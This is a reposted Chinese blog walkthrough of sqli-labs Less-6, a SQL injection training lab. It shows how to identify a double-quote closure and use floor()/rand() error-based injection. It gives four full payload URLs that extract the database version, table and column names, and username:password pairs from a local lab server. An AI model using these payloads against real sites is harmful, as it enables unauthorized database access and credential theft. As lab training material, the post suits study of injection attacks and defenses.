Less-6
发布日期:2022-09-10 02:50:03 浏览次数:3 分类:博客文章

本文共 1028 字,大约阅读时间需要 3 分钟。

Less-6

 

(1)判断注入点的闭合方式

通过添加不同的特殊符号,发现双引号出现报错提示,因此闭合方式为双引号

 

 

(2)报错注入

 

由于页面没有回显,所以采用报错注入更加方便

尝试了上一关结束的几种报错方法,发现只有floor的报错有回显,所以使用该方式注入:

#查询数据库信息 http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat(database(),0x7e,version(),floor(rand(0)*2)) x from information_schema.tables group by x --+ #查询表名
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x --
#查询列名
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select column_name from information_schema.columns where table_name='users' limit 0,1),floor(rand(0)*2)) x from information_schema.tables group by x --+
#查询内容
http://192.168.88.133/mysqli-labs/Less-6/?id=1" union select count(*),0,concat((select concat(username,0x3a,password ) from users limit 1,1),floor(rand(0)*2)) x from information_schema.tables group by x --+
 

 

 

 

 

 

 

 

 

 

 

 

 

 

 注:更多方法可以自己尝试下!,欢迎指正和交流~~

 

转载地址:https://www.cnblogs.com/stickonit/p/16051602.html 如侵犯您的版权,请留言回复原文章的地址,我们会给您删除此文章,给您带来不便请您谅解!

上一篇:less-loader 速度很慢问题分析
下一篇:Less-5

发表评论

最新留言

网站不错 人气很旺了 加油
[***.192.178.218]2024年03月21日 21时30分33秒

关于作者

    喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!
-- 愿君每日到此一游!

推荐文章

java notify怎么用_java 如何使用notify() 2019-04-21
java加载指定文件为当前文本,java:如何使用bufferedreader读取特定的行 2019-04-21
java metrics 怎么样,Java metrics 2019-04-21
在vscode中php语言配置,Visual Studio Code C / C++ 语言环境配置 2019-04-21
php怎么翻译数据库中的中文,javascript – 如何将翻译后的文本插入数据库php 2019-04-21
普朗克公式matlab,用MATLAB实现普朗克函数积分的快捷计算.pdf 2019-04-21
swoolec+%3c?php,PHP+Swoole并发编程的魅力 2019-04-21
php 404配置,phpcms如何配置404 2019-04-21
matlab wash矩阵产生,洗衣机净衣效能与衣损程度的关系分析 2019-04-21
php中如何调用sql server,php调用SQL SERVER 2008及以上版本的方法 2019-04-21
python多线程实现kmeans,3种方式实现python多线程并发处理 2019-04-21
matlab 变量不存在,matlab程序运行时提示变量未定义 2019-04-21
php编码函数 base58,1. Base58可逆加密 2019-04-21
oracle 在需要下列之一,Oracle存储过程中PLS-00103:出现符号“/”在需要下列之一时:(... 2019-04-21
oracle10g dblink优化,Oracle10g通过dblink访问数据异常 2019-04-21
linux安装时的iso文件,直接用ISO文件在linux上安装新系统 2019-04-21
linux修改文件权限为所有人都可以访问,Linux 笔记分享八:文件权限的设定 2019-04-21
linux中卸载ambri-servle,Kerberos 命令使用 2019-04-21
linux二进制反编译,Xori:一款来自BlackHat 2018的二进制反汇编和静态分析工具 2019-04-21
linux两台主机添加信任,Linux两台机器间添加信任,实现不用密码问,互传文件... 2019-04-21